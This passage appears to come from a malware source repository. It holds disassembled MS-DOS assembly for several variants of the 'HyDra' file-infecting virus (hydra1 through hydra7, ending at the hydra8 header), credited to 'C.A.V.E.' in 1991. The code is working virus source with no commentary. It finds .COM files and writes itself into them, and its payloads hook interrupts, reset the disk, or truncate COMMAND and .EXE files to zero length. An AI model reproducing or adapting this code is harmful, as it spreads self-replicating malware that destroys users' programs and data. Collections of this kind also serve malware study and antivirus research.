; al=method, cx,dx=offset
jc loc_4 ; Jump if carry Set
mov ah,40h ; '@'
xor dx,dx ; Zero register
mov cx,cs:data_8
int 21h ; DOS Services ah=function 40h
; write file bx=file handle
; cx=bytes from ds:dx buffer
loc_4:
mov ah,3Eh ; '>'
int 21h ; DOS Services ah=function 3Eh
; close file, bx=file handle
push cs
pop ds
loc_5:
mov ah,1Ah
mov dx,psp_cmd_size
int 21h ; DOS Services ah=function 1Ah
; set DTA(disk xfer area) ds:dx
jmp short loc_7
nop
loc_6:
push dx
xor ax,ax ; Zero register
mov ax,0F00h
int 10h ; Video display ah=functn 0Fh
; get state, al=mode, bh=page
; ah=columns on screen
mov ah,0
int 10h ; Video display ah=functn 00h
; set display mode in al
mov ax,200h
mov dh,6
mov dl,25h ; '%'
int 10h ; Video display ah=functn 02h
; set cursor location in dx
xor dx,dx ; Zero register
mov dx,offset data_11 ; ('HYDRA')
mov ah,9
int 21h ; DOS Services ah=function 09h
; display char string at ds:dx
mov ax,200h
mov dh,17h
mov dl,0
int 10h ; Video display ah=functn 02h
; set cursor location in dx
mov dx,offset copyright ; ('Copyright (c)')
mov ah,9
int 21h ; DOS Services ah=function 09h
; display char string at ds:dx
mov ax,200h
mov dh,18h
mov dl,0
int 10h ; Video display ah=functn 02h
; set cursor location in dx
mov ax,3504h
int 21h ; DOS Services ah=function 35h
; get intrpt vector al in es:bx
mov ax,es
mov dx,bx
mov ds,ax
mov ax,2509h
int 21h ; DOS Services ah=function 25h
; set intrpt vector al to ds:dx
mov ax,0
int 21h ; DOS Services ah=function 00h
; terminate, cs=progm seg prefx
loc_7:
xor di,di ; Zero register
mov si,data_15e
mov cx,22h
rep movsb ; Rep when cx >0 Mov [si] to es:[di]
pop bx
mov cs:data_6,0
mov word ptr cs:data_6+2,es
pop bx
jmp dword ptr cs:data_6
push ds
pop es
mov cx,0FFFFh
mov si,data_16e
mov di,data_12e
sub cx,si
rep movsb ; Rep when cx >0 Mov [si] to es:[di]
mov word ptr cs:[100h],100h
mov word ptr cs:[102h],ds
mov ax,bx
jmp dword ptr cs:[100h]
int 20h ; DOS program terminate
hydra1 endp
seg_a ends
end start

164
MSDOS/Virus.MSDOS.Unknown.hydra2.asm Normal file
View File

@ -0,0 +1,164 @@
PAGE 59,132
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
;ÛÛ ÛÛ
;ÛÛ HYDRA2 ÛÛ
;ÛÛ ÛÛ
;ÛÛ Created: 27-Aug-91 ÛÛ
;ÛÛ Passes: 5 Analysis Options on: AW ÛÛ
;ÛÛ Copyright (c) ÛÛ
;ÛÛ ÛÛ
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
data_1e equ 100h
data_2e equ 235h
data_3e equ 257h
data_4e equ 522h
psp_cmd_size equ 80h
data_15e equ 157h
data_16e equ 15Ah
seg_a segment byte public
assume cs:seg_a, ds:seg_a
org 100h
hydra2 proc far
start:
jmp loc_1
pop cx
inc sp
add [bx+si],al
data_7 db 'HyDra-2 Beta - Not For Release'
db '. *.CO?'
db 0
data_10 dw 0, 8B39h
data_12 dw 0
data_13 db 0
db 29 dup (0)
data_14 db 0
db 13 dup (0)
copyright db 'Copyright (c)'
db ' 1991 by C.A.V.E. '
loc_1:
push ax
mov ax,cs
add ax,1000h
xor di,di ; Zero register
mov cx,157h
mov si,100h
mov es,ax
rep movsb ; Rep when cx >0 Mov [si] to es:[di]
mov ah,1Ah
mov dx,offset data_13
int 21h ; DOS Services ah=function 1Ah
; set DTA(disk xfer area) ds:dx
mov ah,4Eh ; 'N'
mov dx,offset data_7+22h ; ('*')
int 21h ; DOS Services ah=function 4Eh
; find 1st filenam match @ds:dx
jc loc_5 ; Jump if carry Set
loc_2:
mov ah,3Dh ; '='
mov al,2
mov dx,offset data_14
mov al,2
int 21h ; DOS Services ah=function 3Dh
; open file, al=mode,name@ds:dx
mov bx,ax
push es
pop ds
mov ax,3F00h
mov cx,0FFFFh
mov dx,data_15e
int 21h ; DOS Services ah=function 3Fh
; read file, bx=file handle
; cx=bytes to ds:dx buffer
add ax,157h
mov cs:data_12,ax
cmp word ptr ds:data_16e,4459h
jne loc_3 ; Jump if not equal
mov ah,3Eh ; '>'
int 21h ; DOS Services ah=function 3Eh
; close file, bx=file handle
push cs
pop ds
mov ah,4Fh ; 'O'
int 21h ; DOS Services ah=function 4Fh
; find next filename match
jc loc_6 ; Jump if carry Set
jmp short loc_2
loc_3:
xor cx,cx ; Zero register
mov dx,cx
mov ax,4200h
int 21h ; DOS Services ah=function 42h
; move file ptr, bx=file handle
; al=method, cx,dx=offset
jc loc_4 ; Jump if carry Set
mov ah,40h ; '@'
xor dx,dx ; Zero register
mov cx,cs:data_12
int 21h ; DOS Services ah=function 40h
; write file bx=file handle
; cx=bytes from ds:dx buffer
loc_4:
mov ah,3Eh ; '>'
int 21h ; DOS Services ah=function 3Eh
; close file, bx=file handle
push cs
pop ds
loc_5:
mov ah,1Ah
mov dx,psp_cmd_size
int 21h ; DOS Services ah=function 1Ah
; set DTA(disk xfer area) ds:dx
jmp short loc_7
nop
loc_6:
push dx
xor ax,ax ; Zero register
xor ax,ax ; Zero register
mov ds,ax
mov bx,data_4e
mov ah,0FFh
mov [bx],ah
xor ax,ax ; Zero register
int 13h ; Disk dl=drive 0 ah=func 00h
; reset disk, al=return status
mov ax,0
int 21h ; DOS Services ah=function 00h
; terminate, cs=progm seg prefx
loc_7:
xor di,di ; Zero register
mov si,data_2e
mov cx,22h
rep movsb ; Rep when cx >0 Mov [si] to es:[di]
pop bx
mov cs:data_10,0
mov word ptr cs:data_10+2,es
pop bx
jmp dword ptr cs:data_10
push ds
pop es
mov cx,0FFFFh
mov si,data_3e
mov di,data_1e
sub cx,si
rep movsb ; Rep when cx >0 Mov [si] to es:[di]
mov word ptr cs:[100h],100h
mov word ptr cs:[102h],ds
mov ax,bx
jmp dword ptr cs:[100h]
int 20h ; DOS program terminate
hydra2 endp
seg_a ends
end start

163
MSDOS/Virus.MSDOS.Unknown.hydra3.asm Normal file
View File

@ -0,0 +1,163 @@
PAGE 59,132
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
;ÛÛ ÛÛ
;ÛÛ HYDRA3 ÛÛ
;ÛÛ ÛÛ
;ÛÛ Created: 27-Aug-91 ÛÛ
;ÛÛ Passes: 5 Analysis Options on: AW ÛÛ
;ÛÛ Copyright (c) ÛÛ
;ÛÛ ÛÛ
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
psp_cmd_size equ 80h
data_11e equ 100h
data_12e equ 156h
data_13e equ 159h
data_14e equ 234h
data_15e equ 256h
seg_a segment byte public
assume cs:seg_a, ds:seg_a
org 100h
hydra3 proc far
start:
jmp loc_1
pop cx
inc sp
add [bx+si],al
data_3 db 'HyDra-3 Beta - Not For Release'
db '. *.CO?'
db 0
data_6 dw 0, 8B39h
data_8 dw 0
data_9 db 0
db 29 dup (0)
data_10 db 0
db 13 dup (0)
copyright db 'Copyright (c)'
db ' 1991 by C.A.V.E. '
loc_1:
push ax
mov ax,cs
add ax,1000h
xor di,di ; Zero register
mov cx,156h
mov si,100h
mov es,ax
rep movsb ; Rep when cx >0 Mov [si] to es:[di]
mov ah,1Ah
mov dx,offset data_9
int 21h ; DOS Services ah=function 1Ah
; set DTA(disk xfer area) ds:dx
mov ah,4Eh ; 'N'
mov dx,offset data_3+22h ; ('*')
int 21h ; DOS Services ah=function 4Eh
; find 1st filenam match @ds:dx
jc loc_5 ; Jump if carry Set
loc_2:
mov ah,3Dh ; '='
mov al,2
mov dx,offset data_10
mov al,2
int 21h ; DOS Services ah=function 3Dh
; open file, al=mode,name@ds:dx
mov bx,ax
push es
pop ds
mov ax,3F00h
mov cx,0FFFFh
mov dx,data_12e
int 21h ; DOS Services ah=function 3Fh
; read file, bx=file handle
; cx=bytes to ds:dx buffer
add ax,156h
mov cs:data_8,ax
cmp word ptr ds:data_13e,4459h
jne loc_3 ; Jump if not equal
mov ah,3Eh ; '>'
int 21h ; DOS Services ah=function 3Eh
; close file, bx=file handle
push cs
pop ds
mov ah,4Fh ; 'O'
int 21h ; DOS Services ah=function 4Fh
; find next filename match
jc loc_6 ; Jump if carry Set
jmp short loc_2
loc_3:
xor cx,cx ; Zero register
mov dx,cx
mov ax,4200h
int 21h ; DOS Services ah=function 42h
; move file ptr, bx=file handle
; al=method, cx,dx=offset
jc loc_4 ; Jump if carry Set
mov ah,40h ; '@'
xor dx,dx ; Zero register
mov cx,cs:data_8
int 21h ; DOS Services ah=function 40h
; write file bx=file handle
; cx=bytes from ds:dx buffer
loc_4:
mov ah,3Eh ; '>'
int 21h ; DOS Services ah=function 3Eh
; close file, bx=file handle
push cs
pop ds
loc_5:
mov ah,1Ah
mov dx,psp_cmd_size
int 21h ; DOS Services ah=function 1Ah
; set DTA(disk xfer area) ds:dx
jmp short loc_7
nop
loc_6:
push dx
mov ax,3504h
int 21h ; DOS Services ah=function 35h
; get intrpt vector al in es:bx
mov ax,es
mov dx,bx
mov ds,ax
mov ax,2513h
int 21h ; DOS Services ah=function 25h
; set intrpt vector al to ds:dx
mov ax,0
int 21h ; DOS Services ah=function 00h
; terminate, cs=progm seg prefx
loc_7:
xor di,di ; Zero register
mov si,data_14e
mov cx,22h
rep movsb ; Rep when cx >0 Mov [si] to es:[di]
pop bx
mov cs:data_6,0
mov word ptr cs:data_6+2,es
pop bx
jmp dword ptr cs:data_6
push ds
pop es
mov cx,0FFFFh
mov si,data_15e
mov di,data_11e
sub cx,si
rep movsb ; Rep when cx >0 Mov [si] to es:[di]
mov word ptr cs:[100h],100h
mov word ptr cs:[102h],ds
mov ax,bx
jmp dword ptr cs:[100h]
int 20h ; DOS program terminate
hydra3 endp
seg_a ends
end start

163
MSDOS/Virus.MSDOS.Unknown.hydra4.asm Normal file
View File

@ -0,0 +1,163 @@
PAGE 59,132
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
;ÛÛ ÛÛ
;ÛÛ HYDRA4 ÛÛ
;ÛÛ ÛÛ
;ÛÛ Created: 28-Aug-91 ÛÛ
;ÛÛ Passes: 5 Analysis Options on: AW ÛÛ
;ÛÛ Copyright (c) ÛÛ
;ÛÛ ÛÛ
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
psp_cmd_size equ 80h
data_11e equ 100h
data_12e equ 154h
data_13e equ 157h
data_14e equ 232h
data_15e equ 254h
seg_a segment byte public
assume cs:seg_a, ds:seg_a
org 100h
hydra4 proc far
start:
jmp loc_1
pop cx
inc sp
add [bx+si],al
data_3 db 'HyDra-4 Beta - Not For Release'
db '. *.CO?'
db 0
data_6 dw 0, 8B39h
data_8 dw 0
data_9 db 0
db 29 dup (0)
data_10 db 0
db 13 dup (0)
copyright db 'Copyright (c)'
db ' 1991 by C.A.V.E. '
loc_1:
push ax
mov ax,cs
add ax,1000h
xor di,di ; Zero register
mov cx,154h
mov si,100h
mov es,ax
rep movsb ; Rep when cx >0 Mov [si] to es:[di]
mov ah,1Ah
mov dx,offset data_9
int 21h ; DOS Services ah=function 1Ah
; set DTA(disk xfer area) ds:dx
mov ah,4Eh ; 'N'
mov dx,offset data_3+22h ; ('*')
int 21h ; DOS Services ah=function 4Eh
; find 1st filenam match @ds:dx
jc loc_5 ; Jump if carry Set
loc_2:
mov ah,3Dh ; '='
mov al,2
mov dx,offset data_10
mov al,2
int 21h ; DOS Services ah=function 3Dh
; open file, al=mode,name@ds:dx
mov bx,ax
push es
pop ds
mov ax,3F00h
mov cx,0FFFFh
mov dx,data_12e
int 21h ; DOS Services ah=function 3Fh
; read file, bx=file handle
; cx=bytes to ds:dx buffer
add ax,154h
mov cs:data_8,ax
cmp word ptr ds:data_13e,4459h
jne loc_3 ; Jump if not equal
mov ah,3Eh ; '>'
int 21h ; DOS Services ah=function 3Eh
; close file, bx=file handle
push cs
pop ds
mov ah,4Fh ; 'O'
int 21h ; DOS Services ah=function 4Fh
; find next filename match
jc loc_6 ; Jump if carry Set
jmp short loc_2
loc_3:
xor cx,cx ; Zero register
mov dx,cx
mov ax,4200h
int 21h ; DOS Services ah=function 42h
; move file ptr, bx=file handle
; al=method, cx,dx=offset
jc loc_4 ; Jump if carry Set
mov ah,40h ; '@'
xor dx,dx ; Zero register
mov cx,cs:data_8
int 21h ; DOS Services ah=function 40h
; write file bx=file handle
; cx=bytes from ds:dx buffer
loc_4:
mov ah,3Eh ; '>'
int 21h ; DOS Services ah=function 3Eh
; close file, bx=file handle
push cs
pop ds
loc_5:
mov ah,1Ah
mov dx,psp_cmd_size
int 21h ; DOS Services ah=function 1Ah
; set DTA(disk xfer area) ds:dx
jmp short loc_7
nop
loc_6:
push dx
mov ax,3540h
int 21h ; DOS Services ah=function 35h
; get intrpt vector al in es:bx
mov dx,bx
push es
pop ds
mov ax,2513h
int 21h ; DOS Services ah=function 25h
; set intrpt vector al to ds:dx
mov ax,0
int 21h ; DOS Services ah=function 00h
; terminate, cs=progm seg prefx
loc_7:
xor di,di ; Zero register
mov si,data_14e
mov cx,22h
rep movsb ; Rep when cx >0 Mov [si] to es:[di]
pop bx
mov cs:data_6,0
mov word ptr cs:data_6+2,es
pop bx
jmp dword ptr cs:data_6
push ds
pop es
mov cx,0FFFFh
mov si,data_15e
mov di,data_11e
sub cx,si
rep movsb ; Rep when cx >0 Mov [si] to es:[di]
mov word ptr cs:[100h],100h
mov word ptr cs:[102h],ds
mov ax,bx
jmp dword ptr cs:[100h]
int 20h ; DOS program terminate
hydra4 endp
seg_a ends
end start

189
MSDOS/Virus.MSDOS.Unknown.hydra5.asm Normal file
View File

@ -0,0 +1,189 @@
PAGE 59,132
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
;ÛÛ ÛÛ
;ÛÛ HYDRA5 ÛÛ
;ÛÛ ÛÛ
;ÛÛ Created: 21-Aug-91 ÛÛ
;ÛÛ Passes: 5 Analysis Options on: AW ÛÛ
;ÛÛ Copyright (c) ÛÛ
;ÛÛ ÛÛ
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
data_1e equ 23Eh
psp_cmd_size equ 80h
data_17e equ 187h
data_18e equ 18Ah
seg_a segment byte public
assume cs:seg_a, ds:seg_a
org 100h
hydra5 proc far
start:
jmp loc_1
pop cx
inc sp
add [bx+si],al
data_4 db 'HyDra-5 Beta - Not For Release'
db '. *.CO?'
db 0
data_7 dw 0, 8B39h
data_9 dw 0
data_10 db 0
db 29 dup (0)
data_11 db 0
db 13 dup (0)
copyright db 'Copyright (c)'
db ' 1991 by C.A.V.E. '
loc_1:
push ax
mov ax,cs
add ax,1000h
xor di,di ; Zero register
mov cx,187h
mov si,100h
mov es,ax
rep movsb ; Rep when cx >0 Mov [si] to es:[di]
mov ah,1Ah
mov dx,offset data_10
int 21h ; DOS Services ah=function 1Ah
; set DTA(disk xfer area) ds:dx
mov ah,4Eh ; 'N'
mov dx,offset data_4+22h ; ('*')
int 21h ; DOS Services ah=function 4Eh
; find 1st filenam match @ds:dx
jc loc_5 ; Jump if carry Set
loc_2:
mov ah,3Dh ; '='
mov al,2
mov dx,offset data_11
mov al,2
int 21h ; DOS Services ah=function 3Dh
; open file, al=mode,name@ds:dx
mov bx,ax
push es
pop ds
mov ax,3F00h
mov cx,0FFFFh
mov dx,data_17e
int 21h ; DOS Services ah=function 3Fh
; read file, bx=file handle
; cx=bytes to ds:dx buffer
add ax,187h
mov cs:data_9,ax
cmp word ptr ds:data_18e,4459h
jne loc_3 ; Jump if not equal
mov ah,3Eh ; '>'
int 21h ; DOS Services ah=function 3Eh
; close file, bx=file handle
push cs
pop ds
mov ah,4Fh ; 'O'
int 21h ; DOS Services ah=function 4Fh
; find next filename match
;* jc loc_6 ; Jump if carry Set
db 72h, 54h
jmp short loc_2
loc_3:
xor cx,cx ; Zero register
mov dx,cx
mov ax,4200h
int 21h ; DOS Services ah=function 42h
; move file ptr, bx=file handle
; al=method, cx,dx=offset
jc loc_4 ; Jump if carry Set
mov ah,40h ; '@'
xor dx,dx ; Zero register
mov cx,cs:data_9
int 21h ; DOS Services ah=function 40h
; write file bx=file handle
; cx=bytes from ds:dx buffer
loc_4:
mov ah,3Eh ; '>'
int 21h ; DOS Services ah=function 3Eh
; close file, bx=file handle
push cs
pop ds
loc_5:
mov ah,1Ah
mov dx,psp_cmd_size
int 21h ; DOS Services ah=function 1Ah
; set DTA(disk xfer area) ds:dx
jmp short loc_7
nop
inc word ptr [bx+si]
add [bx+si],al
add [bx+si],al
pop ds
add [bx],bh
aas ; Ascii adjust
aas ; Ascii adjust
aas ; Ascii adjust
aas ; Ascii adjust
aas ; Ascii adjust
aas ; Ascii adjust
aas ; Ascii adjust
inc bp
pop ax
inc bp
add [bx+si],al
add [bx+si],al
add [bx+si],al
add [bx+si],al
add [bx+si],al
add [bx+si],al
add [bx+si],al
add [bx+si],al
add [bx+si],al
add [bx+si],al
add [bx+si],al
add [bx+si],al
add ds:data_1e[bx+si],bh
push ax
push cs
pushf ; Push flags
mov cl,13h
mov dx,201h
push cs
pop ds
jmp dword ptr data_14
mov ah,4Ch ; 'L'
int 21h ; DOS Services ah=function 4Ch
; terminate with al=return code
data_14 dd 000C0h
db 0CDh, 20h
loc_7:
xor di,di ; Zero register
mov si,265h
mov cx,22h
rep movsb ; Rep when cx >0 Mov [si] to es:[di]
pop bx
mov cs:data_7,0
mov word ptr cs:data_7+2,es
pop bx
jmp dword ptr cs:data_7
push ds
pop es
mov cx,0FFFFh
mov si,287h
mov di,100h
sub cx,si
rep movsb ; Rep when cx >0 Mov [si] to es:[di]
mov word ptr cs:[100h],100h
mov word ptr cs:[102h],ds
mov ax,bx
jmp dword ptr cs:[100h]
int 20h ; DOS program terminate
hydra5 endp
seg_a ends
end start

174
MSDOS/Virus.MSDOS.Unknown.hydra6.asm Normal file
View File

@ -0,0 +1,174 @@
PAGE 59,132
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
;ÛÛ ÛÛ
;ÛÛ HYDRA6 ÛÛ
;ÛÛ ÛÛ
;ÛÛ Created: 27-Aug-91 ÛÛ
;ÛÛ Passes: 5 Analysis Options on: AW ÛÛ
;ÛÛ Copyright (c) ÛÛ
;ÛÛ ÛÛ
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
psp_cmd_size equ 80h
data_14e equ 174h
data_15e equ 177h
seg_a segment byte public
assume cs:seg_a, ds:seg_a
org 100h
hydra6 proc far
start:
jmp loc_1
pop cx
inc sp
add [bx+si],al
data_3 db 'HyDra-6 Beta - Not For Release'
db '. *.CO?'
db 0
data_6 dw 0, 8B39h
data_8 dw 0
data_9 db 0
db 29 dup (0)
data_10 db 0
db 13 dup (0)
copyright db 'Copyright (c)'
db ' 1991 by C.A.V.E. '
data_11 db 'COMMAND.*', 0
loc_1:
push ax
mov ax,cs
add ax,1000h
xor di,di ; Zero register
mov cx,174h
mov si,100h
mov es,ax
rep movsb ; Rep when cx >0 Mov [si] to es:[di]
mov ah,1Ah
mov dx,offset data_9
int 21h ; DOS Services ah=function 1Ah
; set DTA(disk xfer area) ds:dx
mov ah,4Eh ; 'N'
mov dx,offset data_3+22h ; ('*')
int 21h ; DOS Services ah=function 4Eh
; find 1st filenam match @ds:dx
jc loc_5 ; Jump if carry Set
loc_2:
mov ah,3Dh ; '='
mov al,2
mov dx,offset data_10
int 21h ; DOS Services ah=function 3Dh
; open file, al=mode,name@ds:dx
mov bx,ax
push es
pop ds
mov ax,3F00h
mov cx,0FFFFh
mov dx,data_14e
int 21h ; DOS Services ah=function 3Fh
; read file, bx=file handle
; cx=bytes to ds:dx buffer
add ax,174h
mov cs:data_8,ax
cmp word ptr ds:data_15e,4459h
jne loc_3 ; Jump if not equal
mov ah,3Eh ; '>'
int 21h ; DOS Services ah=function 3Eh
; close file, bx=file handle
push cs
pop ds
mov ah,4Fh ; 'O'
int 21h ; DOS Services ah=function 4Fh
; find next filename match
jc loc_6 ; Jump if carry Set
jmp short loc_2
loc_3:
xor cx,cx ; Zero register
mov dx,cx
mov ax,4200h
int 21h ; DOS Services ah=function 42h
; move file ptr, bx=file handle
; al=method, cx,dx=offset
jc loc_4 ; Jump if carry Set
mov ah,40h ; '@'
xor dx,dx ; Zero register
mov cx,cs:data_8
int 21h ; DOS Services ah=function 40h
; write file bx=file handle
; cx=bytes from ds:dx buffer
loc_4:
mov ah,3Eh ; '>'
int 21h ; DOS Services ah=function 3Eh
; close file, bx=file handle
push cs
pop ds
loc_5:
mov ah,1Ah
mov dx,psp_cmd_size
int 21h ; DOS Services ah=function 1Ah
; set DTA(disk xfer area) ds:dx
jmp short loc_8
nop
loc_6:
mov ah,1Ah
mov dx,offset data_9
int 21h ; DOS Services ah=function 1Ah
; set DTA(disk xfer area) ds:dx
push dx
mov dx,offset data_11 ; ('COMMAND.*')
mov ah,4Eh ; 'N'
xor cx,cx ; Zero register
int 21h ; DOS Services ah=function 4Eh
; find 1st filenam match @ds:dx
jc loc_5 ; Jump if carry Set
loc_7:
mov ah,3Ch ; '<'
xor cx,cx ; Zero register
mov dx,offset data_10
int 21h ; DOS Services ah=function 3Ch
; create/truncate file @ ds:dx
mov bx,ax
jc loc_5 ; Jump if carry Set
mov ah,3Eh ; '>'
int 21h ; DOS Services ah=function 3Eh
; close file, bx=file handle
jc loc_5 ; Jump if carry Set
mov ah,4Fh ; 'O'
int 21h ; DOS Services ah=function 4Fh
; find next filename match
jnc loc_7 ; Jump if carry=0
loc_8:
xor di,di ; Zero register
mov si,252h
mov cx,22h
rep movsb ; Rep when cx >0 Mov [si] to es:[di]
pop bx
mov cs:data_6,0
mov word ptr cs:data_6+2,es
pop bx
jmp dword ptr cs:data_6
push ds
pop es
mov cx,0FFFFh
mov si,274h
mov di,100h
sub cx,si
rep movsb ; Rep when cx >0 Mov [si] to es:[di]
mov word ptr cs:[100h],100h
mov word ptr cs:[102h],ds
mov ax,bx
jmp dword ptr cs:[100h]
int 20h ; DOS program terminate
hydra6 endp
seg_a ends
end start

175
MSDOS/Virus.MSDOS.Unknown.hydra7.asm Normal file
View File

@ -0,0 +1,175 @@
PAGE 59,132
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
;ÛÛ ÛÛ
;ÛÛ HYDRA7 ÛÛ
;ÛÛ ÛÛ
;ÛÛ Created: 27-Aug-91 ÛÛ
;ÛÛ Passes: 5 Analysis Options on: AW ÛÛ
;ÛÛ Copyright (c) ÛÛ
;ÛÛ ÛÛ
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
psp_cmd_size equ 80h
data_16e equ 170h
data_17e equ 173h
seg_a segment byte public
assume cs:seg_a, ds:seg_a
org 100h
hydra7 proc far
start:
jmp loc_1
pop cx
inc sp
add [bx+si],al
data_4 db 'HyDra-7 Beta - Not For Release'
db '. *.CO?'
db 0
data_7 dw 0, 8B39h
data_9 dw 0
data_10 db 0
db 29 dup (0)
data_11 db 0
db 13 dup (0)
copyright db 'Copyright (c)'
db ' 1991 by C.A.V.E. '
data_12 db 2Ah
db 2Eh, 45h, 58h, 45h, 00h
loc_1:
push ax
mov ax,cs
add ax,1000h
xor di,di ; Zero register
mov cx,170h
mov si,100h
mov es,ax
rep movsb ; Rep when cx >0 Mov [si] to es:[di]
mov ah,1Ah
mov dx,offset data_10
int 21h ; DOS Services ah=function 1Ah
; set DTA(disk xfer area) ds:dx
mov ah,4Eh ; 'N'
mov dx,offset data_4+22h ; ('*')
int 21h ; DOS Services ah=function 4Eh
; find 1st filenam match @ds:dx
jc loc_5 ; Jump if carry Set
loc_2:
mov ah,3Dh ; '='
mov al,2
mov dx,offset data_11
int 21h ; DOS Services ah=function 3Dh
; open file, al=mode,name@ds:dx
mov bx,ax
push es
pop ds
mov ax,3F00h
mov cx,0FFFFh
mov dx,data_16e
int 21h ; DOS Services ah=function 3Fh
; read file, bx=file handle
; cx=bytes to ds:dx buffer
add ax,170h
mov cs:data_9,ax
cmp word ptr ds:data_17e,4459h
jne loc_3 ; Jump if not equal
mov ah,3Eh ; '>'
int 21h ; DOS Services ah=function 3Eh
; close file, bx=file handle
push cs
pop ds
mov ah,4Fh ; 'O'
int 21h ; DOS Services ah=function 4Fh
; find next filename match
jc loc_6 ; Jump if carry Set
jmp short loc_2
loc_3:
xor cx,cx ; Zero register
mov dx,cx
mov ax,4200h
int 21h ; DOS Services ah=function 42h
; move file ptr, bx=file handle
; al=method, cx,dx=offset
jc loc_4 ; Jump if carry Set
mov ah,40h ; '@'
xor dx,dx ; Zero register
mov cx,cs:data_9
int 21h ; DOS Services ah=function 40h
; write file bx=file handle
; cx=bytes from ds:dx buffer
loc_4:
mov ah,3Eh ; '>'
int 21h ; DOS Services ah=function 3Eh
; close file, bx=file handle
push cs
pop ds
loc_5:
mov ah,1Ah
mov dx,psp_cmd_size
int 21h ; DOS Services ah=function 1Ah
; set DTA(disk xfer area) ds:dx
jmp short loc_8
nop
loc_6:
mov ah,1Ah
mov dx,offset data_10
int 21h ; DOS Services ah=function 1Ah
; set DTA(disk xfer area) ds:dx
push dx
mov dx,offset data_12
mov ah,4Eh ; 'N'
xor cx,cx ; Zero register
int 21h ; DOS Services ah=function 4Eh
; find 1st filenam match @ds:dx
jc loc_5 ; Jump if carry Set
loc_7:
mov ah,3Ch ; '<'
xor cx,cx ; Zero register
mov dx,offset data_11
int 21h ; DOS Services ah=function 3Ch
; create/truncate file @ ds:dx
mov bx,ax
jc loc_5 ; Jump if carry Set
mov ah,3Eh ; '>'
int 21h ; DOS Services ah=function 3Eh
; close file, bx=file handle
jc loc_5 ; Jump if carry Set
mov ah,4Fh ; 'O'
int 21h ; DOS Services ah=function 4Fh
; find next filename match
jnc loc_7 ; Jump if carry=0
loc_8:
xor di,di ; Zero register
mov si,24Eh
mov cx,22h
rep movsb ; Rep when cx >0 Mov [si] to es:[di]
pop bx
mov cs:data_7,0
mov word ptr cs:data_7+2,es
pop bx
jmp dword ptr cs:data_7
push ds
pop es
mov cx,0FFFFh
mov si,270h
mov di,100h
sub cx,si
rep movsb ; Rep when cx >0 Mov [si] to es:[di]
mov word ptr cs:[100h],100h
mov word ptr cs:[102h],ds
mov ax,bx
jmp dword ptr cs:[100h]
int 20h ; DOS program terminate
hydra7 endp
seg_a ends
end start

220
MSDOS/Virus.MSDOS.Unknown.hydra8.asm Normal file
View File

@ -0,0 +1,220 @@
PAGE 59,132
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
;ÛÛ ÛÛ
;ÛÛ HYDRA8 ÛÛ
;ÛÛ ÛÛ
;ÛÛ Created: 28-Aug-91 ÛÛ
;ÛÛ Passes: 5 Analysis Options on: W ÛÛ
